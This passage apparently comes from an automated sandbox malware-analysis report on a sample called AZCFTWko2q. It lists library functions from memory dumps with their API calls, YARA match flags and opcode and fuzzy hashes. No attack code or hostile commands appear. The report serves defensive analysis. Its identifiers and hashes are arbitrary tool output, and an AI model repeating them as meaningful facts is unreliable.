                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12311232A0021AABDF24CF65CC40DAF7BAAEF80714F06026EED24D7250EB35C951CB90
                                                                                                                                                                                                                                                                                      Function 024CD652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 531285432-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                                      • Instruction ID: 646cc8fe2d83adde2bde8f9c11e81b4c899ec82ede90ad52a219de731c094558
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02214F79E0010AAFDF40EF99CC819BEB7B9EF09714F20006EE605A7250D775AD01CB90
                                                                                                                                                                                                                                                                                      Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 531285432-0
                                                                                                                                                                                                                                                                                      • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                                      • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                                                                                                                                                                                                      Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                                                                        • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                                                                                                                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2630251706-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                                      • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                                                                                                                                                                                                      Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                                                                                                                                                                                                      • UpdateWindow.USER32 ref: 00401FB7
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1339878773-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                                      • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                                                                      Function 024E9330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 024E934A
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024E92C6
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E9297: ___AdjustPointer.LIBCMT ref: 024E92E1
                                                                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 024E935F
                                                                                                                                                                                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024E9370
                                                                                                                                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 024E9398
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                                      • Instruction ID: 83a4e2b0a4ac421c46b98e6dfee527748f83cfdcc750ee235303394c005fd0fa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC011772100148BBEF126E96CC40EEB3F6AEF48755F054419FE499A160D372E861ABA0
                                                                                                                                                                                                                                                                                      Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                                      • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                                                                      Function 024F5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378), ref: 024F51C8
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024F2213), ref: 024F51D4
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024F513D,00000000,00000000,00000000,00000000,?,024F53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024F51E2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction ID: 46d4cad5752d5eb509e7f9e0e7faece8045562936209ace5683fc246282be1a1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B012036A022226BC7714F799C44E577B98AF86F617510731FA05D7241C720E541CAE4
                                                                                                                                                                                                                                                                                      Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                                                                      Function 024E6395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024E63AF
                                                                                                                                                                                                                                                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024E63C3
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024E63DB
                                                                                                                                                                                                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024E63F3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 78362717-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                                      • Instruction ID: 81c69299a835aa918ba511e6bb5bddb62a1f90da02ee6139a2aa40fed0068101
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D601F936600614B7EF16EE59C850AEF779E9F65761F01005BEC23EB381DAB0ED11CAA0
                                                                                                                                                                                                                                                                                      Function 024E2B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
                                                                                                                                                                                                                                                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
                                                                                                                                                                                                                                                                                        • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                                      • Instruction ID: 8de8eb5cdab98f28f590e1f8a502191193ae98d7daddfe58296bc3d5ac6bd466
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8118E76800204AFC715DF65C880ADBF7BAFF59320F014A5FE9568B591DBB0E904CBA0
                                                                                                                                                                                                                                                                                      Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 78362717-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                                      • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                                                                                                                                                                                                      Function 024E2B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 024E2BB1
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024E2BCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024D86A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D8687: Hash.LIBCMT ref: 024D86E8
                                                                                                                                                                                                                                                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024E2BD8
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024E2BF8
                                                                                                                                                                                                                                                                                        • Part of subcall function 024DF6DF: Hash.LIBCMT ref: 024DF6F1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                                      • Instruction ID: 59e08c815c588de5c0ee28ceb7b2c987c6e1d7029255c77ed5ff777828fc59c0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92011776400604ABCB24DF66C881EDAB7EAEF48320B108A1EE55A87650DBB0F9448B60
                                                                                                                                                                                                                                                                                      Function 024C50CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 024C50D1
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
                                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 024C512B
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                                      • Instruction ID: 36e30c5a337328801767f38a337664196c51b09789e3ddebe6308d06bff41201
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE018875D10309AFDB81EFA9C484B9DB7B1BF54315F60802FD059AB280CB789584CF95
                                                                                                                                                                                                                                                                                      Function 024C5B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 024C5B8D
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBDAE: __EH_prolog3_GS.LIBCMT ref: 024CBDB5
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C5BD8
                                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 024C5BE7
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C5BF7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                                      • Instruction ID: 7f4e826561725ce430ae2d31f30f72ea0b42f73d67a3772ca3868240406ece1f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE014875910209AFDB80EFA9D484B9DB7B1BF54315F60802FD059AB280DBB89984CF95
                                                                                                                                                                                                                                                                                      Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 00405980
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
